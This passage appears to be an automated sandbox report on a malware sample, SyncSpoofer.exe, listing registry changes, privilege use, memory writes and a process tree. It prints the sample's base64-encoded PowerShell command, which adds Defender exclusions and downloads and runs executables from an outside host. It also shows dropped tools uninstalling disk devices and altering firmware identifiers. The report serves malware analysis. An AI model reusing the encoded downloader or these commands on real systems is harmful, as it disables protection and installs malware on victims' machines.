Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000_Classes\Local Settings	sphyperRuntimedhcpSvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000_Classes\Local Settings	sphyperRuntimedhcpSvc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2468	powershell.exe
2468	powershell.exe
4092	DevManView.exe
4092	DevManView.exe
4884	DevManView.exe
4884	DevManView.exe
2060	DevManView.exe
2060	DevManView.exe
3776	DevManView.exe
3776	DevManView.exe
952	DevManView.exe
952	DevManView.exe
2612	DevManView.exe
2612	DevManView.exe
2352	DevManView.exe
2352	DevManView.exe
4204	DevManView.exe
4204	DevManView.exe
1988	DevManView.exe
1988	DevManView.exe
2156	DevManView.exe
2156	DevManView.exe
1912	DevManView.exe
1912	DevManView.exe
4032	DevManView.exe
3060	DevManView.exe
4032	DevManView.exe
3060	DevManView.exe
4260	DevManView.exe
4260	DevManView.exe
464	DevManView.exe
464	DevManView.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe
4712	sphyperRuntimedhcpSvc.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
312	HpsrSpoof.exe
3464	.conhostsft.exe

Suspicious behavior: LoadsDriver 30 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeBackupPrivilege	4092	DevManView.exe
Token: SeRestorePrivilege	4092	DevManView.exe
Token: SeTakeOwnershipPrivilege	4092	DevManView.exe
Token: SeBackupPrivilege	4884	DevManView.exe
Token: SeRestorePrivilege	4884	DevManView.exe
Token: SeBackupPrivilege	3776	DevManView.exe
Token: SeTakeOwnershipPrivilege	4884	DevManView.exe
Token: SeRestorePrivilege	3776	DevManView.exe
Token: SeTakeOwnershipPrivilege	3776	DevManView.exe
Token: SeBackupPrivilege	2612	DevManView.exe
Token: SeRestorePrivilege	2612	DevManView.exe
Token: SeTakeOwnershipPrivilege	2612	DevManView.exe
Token: SeBackupPrivilege	952	DevManView.exe
Token: SeRestorePrivilege	952	DevManView.exe
Token: SeTakeOwnershipPrivilege	952	DevManView.exe
Token: SeBackupPrivilege	2060	DevManView.exe
Token: SeRestorePrivilege	2060	DevManView.exe
Token: SeTakeOwnershipPrivilege	2060	DevManView.exe
Token: SeImpersonatePrivilege	2060	DevManView.exe
Token: SeBackupPrivilege	2352	DevManView.exe
Token: SeRestorePrivilege	2352	DevManView.exe
Token: SeTakeOwnershipPrivilege	2352	DevManView.exe
Token: SeImpersonatePrivilege	3776	DevManView.exe
Token: SeImpersonatePrivilege	952	DevManView.exe
Token: SeImpersonatePrivilege	4884	DevManView.exe
Token: SeImpersonatePrivilege	2612	DevManView.exe
Token: SeImpersonatePrivilege	4092	DevManView.exe
Token: SeImpersonatePrivilege	2352	DevManView.exe
Token: SeBackupPrivilege	4204	DevManView.exe
Token: SeRestorePrivilege	4204	DevManView.exe
Token: SeTakeOwnershipPrivilege	4204	DevManView.exe
Token: SeImpersonatePrivilege	4204	DevManView.exe
Token: SeBackupPrivilege	1988	DevManView.exe
Token: SeRestorePrivilege	1988	DevManView.exe
Token: SeTakeOwnershipPrivilege	1988	DevManView.exe
Token: SeImpersonatePrivilege	1988	DevManView.exe
Token: SeBackupPrivilege	2156	DevManView.exe
Token: SeRestorePrivilege	2156	DevManView.exe
Token: SeTakeOwnershipPrivilege	2156	DevManView.exe
Token: SeImpersonatePrivilege	2156	DevManView.exe
Token: SeBackupPrivilege	1912	DevManView.exe
Token: SeRestorePrivilege	1912	DevManView.exe
Token: SeTakeOwnershipPrivilege	1912	DevManView.exe
Token: SeImpersonatePrivilege	1912	DevManView.exe
Token: SeBackupPrivilege	4032	DevManView.exe
Token: SeRestorePrivilege	4032	DevManView.exe
Token: SeTakeOwnershipPrivilege	4032	DevManView.exe
Token: SeBackupPrivilege	3060	DevManView.exe
Token: SeRestorePrivilege	3060	DevManView.exe
Token: SeTakeOwnershipPrivilege	3060	DevManView.exe
Token: SeImpersonatePrivilege	3060	DevManView.exe
Token: SeBackupPrivilege	4260	DevManView.exe
Token: SeRestorePrivilege	4260	DevManView.exe
Token: SeTakeOwnershipPrivilege	4260	DevManView.exe
Token: SeImpersonatePrivilege	4032	DevManView.exe
Token: SeBackupPrivilege	464	DevManView.exe
Token: SeRestorePrivilege	464	DevManView.exe
Token: SeTakeOwnershipPrivilege	464	DevManView.exe
Token: SeImpersonatePrivilege	4260	DevManView.exe
Token: SeImpersonatePrivilege	464	DevManView.exe
Token: SeLoadDriverPrivilege	3060	DevManView.exe
Token: SeLoadDriverPrivilege	464	DevManView.exe
Token: SeLoadDriverPrivilege	3060	DevManView.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4556	SyncSpoofer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4556 wrote to memory of 2468	4556	SyncSpoofer.exe	84
PID 4556 wrote to memory of 2468	4556	SyncSpoofer.exe	84
PID 4556 wrote to memory of 2468	4556	SyncSpoofer.exe	84
PID 2468 wrote to memory of 312	2468	powershell.exe	94
PID 2468 wrote to memory of 312	2468	powershell.exe	94
PID 2468 wrote to memory of 4248	2468	powershell.exe	97
PID 2468 wrote to memory of 4248	2468	powershell.exe	97
PID 2468 wrote to memory of 4248	2468	powershell.exe	97
PID 2468 wrote to memory of 3640	2468	powershell.exe	98
PID 2468 wrote to memory of 3640	2468	powershell.exe	98
PID 2468 wrote to memory of 3640	2468	powershell.exe	98
PID 312 wrote to memory of 3268	312	HpsrSpoof.exe	99
PID 312 wrote to memory of 3268	312	HpsrSpoof.exe	99
PID 4248 wrote to memory of 4336	4248	sphyperRuntimedhcpSvc.exe	101
PID 4248 wrote to memory of 4336	4248	sphyperRuntimedhcpSvc.exe	101
PID 4248 wrote to memory of 4336	4248	sphyperRuntimedhcpSvc.exe	101
PID 3268 wrote to memory of 2600	3268	cmd.exe	102
PID 3268 wrote to memory of 2600	3268	cmd.exe	102
PID 312 wrote to memory of 1504	312	HpsrSpoof.exe	108
PID 312 wrote to memory of 1504	312	HpsrSpoof.exe	108
PID 1504 wrote to memory of 4884	1504	cmd.exe	110
PID 1504 wrote to memory of 4884	1504	cmd.exe	110
PID 1504 wrote to memory of 4092	1504	cmd.exe	111
PID 1504 wrote to memory of 4092	1504	cmd.exe	111
PID 1504 wrote to memory of 3776	1504	cmd.exe	112
PID 1504 wrote to memory of 3776	1504	cmd.exe	112
PID 1504 wrote to memory of 2060	1504	cmd.exe	113
PID 1504 wrote to memory of 2060	1504	cmd.exe	113
PID 1504 wrote to memory of 2612	1504	cmd.exe	114
PID 1504 wrote to memory of 2612	1504	cmd.exe	114
PID 1504 wrote to memory of 952	1504	cmd.exe	115
PID 1504 wrote to memory of 952	1504	cmd.exe	115
PID 1504 wrote to memory of 2352	1504	cmd.exe	116
PID 1504 wrote to memory of 2352	1504	cmd.exe	116
PID 1504 wrote to memory of 4204	1504	cmd.exe	232
PID 1504 wrote to memory of 4204	1504	cmd.exe	232
PID 1504 wrote to memory of 1988	1504	cmd.exe	211
PID 1504 wrote to memory of 1988	1504	cmd.exe	211
PID 1504 wrote to memory of 2156	1504	cmd.exe	275
PID 1504 wrote to memory of 2156	1504	cmd.exe	275
PID 1504 wrote to memory of 1912	1504	cmd.exe	143
PID 1504 wrote to memory of 1912	1504	cmd.exe	143
PID 1504 wrote to memory of 4260	1504	cmd.exe	144
PID 1504 wrote to memory of 4260	1504	cmd.exe	144
PID 1504 wrote to memory of 3060	1504	cmd.exe	122
PID 1504 wrote to memory of 3060	1504	cmd.exe	122
PID 1504 wrote to memory of 464	1504	cmd.exe	123
PID 1504 wrote to memory of 464	1504	cmd.exe	123
PID 1504 wrote to memory of 4032	1504	cmd.exe	145
PID 1504 wrote to memory of 4032	1504	cmd.exe	145
PID 3640 wrote to memory of 1888	3640	conhostsft.exe	105
PID 3640 wrote to memory of 1888	3640	conhostsft.exe	105
PID 4336 wrote to memory of 5088	4336	WScript.exe	126
PID 4336 wrote to memory of 5088	4336	WScript.exe	126
PID 4336 wrote to memory of 5088	4336	WScript.exe	126
PID 5088 wrote to memory of 4712	5088	cmd.exe	128
PID 5088 wrote to memory of 4712	5088	cmd.exe	128
PID 312 wrote to memory of 4708	312	HpsrSpoof.exe	351
PID 312 wrote to memory of 4708	312	HpsrSpoof.exe	351
PID 4708 wrote to memory of 4820	4708	cmd.exe	315
PID 4708 wrote to memory of 4820	4708	cmd.exe	315
PID 312 wrote to memory of 1236	312	HpsrSpoof.exe	140
PID 312 wrote to memory of 1236	312	HpsrSpoof.exe	140
PID 1236 wrote to memory of 3100	1236	cmd.exe	142

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\SyncSpoofer.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4556
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZwBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgBhAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZABoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABuAHkAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwBqAHMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHAAaABhACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAHQAZwBrACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaQB5AGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAaQB0AGUAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAHUAawBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBjAHYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawB5AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBjAGcAcgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAGkAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBlAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGsAcABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAagBsACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBpAHoAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAByAHEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcAByAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcgBmACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAHIAeAB3ACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID:312
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T7UM-FFL6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3268
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: T7UM-FFL6
        5⤵
        Executes dropped EXE
        
        PID:2600
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4884
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2060
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:952
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Drops file in Windows directory
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:464
    - - C:\ProgramData\Microsoft\Windows\DevManView.exe
        
        C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4708
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31038HP-TRGT28281AB
        5⤵
        Executes dropped EXE
        
        PID:4820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1236
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231038HP-TRGT28281RV
        5⤵
        Executes dropped EXE
        
        PID:3100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:4568
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831038HP-TRGT28281SG
        5⤵
        Executes dropped EXE
        
        PID:4012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1672
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:4168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:3836
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531041HP-TRGT6262SL
        5⤵
        Executes dropped EXE
        
        PID:2920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:3848
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431041HP-TRGT6262FA
        5⤵
        Executes dropped EXE
        
        PID:3420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:3316
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631041HP-TRGT6262FU
        5⤵
        Executes dropped EXE
        
        PID:4600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:408
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331041HP-TRGT6262DQ
        5⤵
        Executes dropped EXE
        
        PID:2188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:532
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
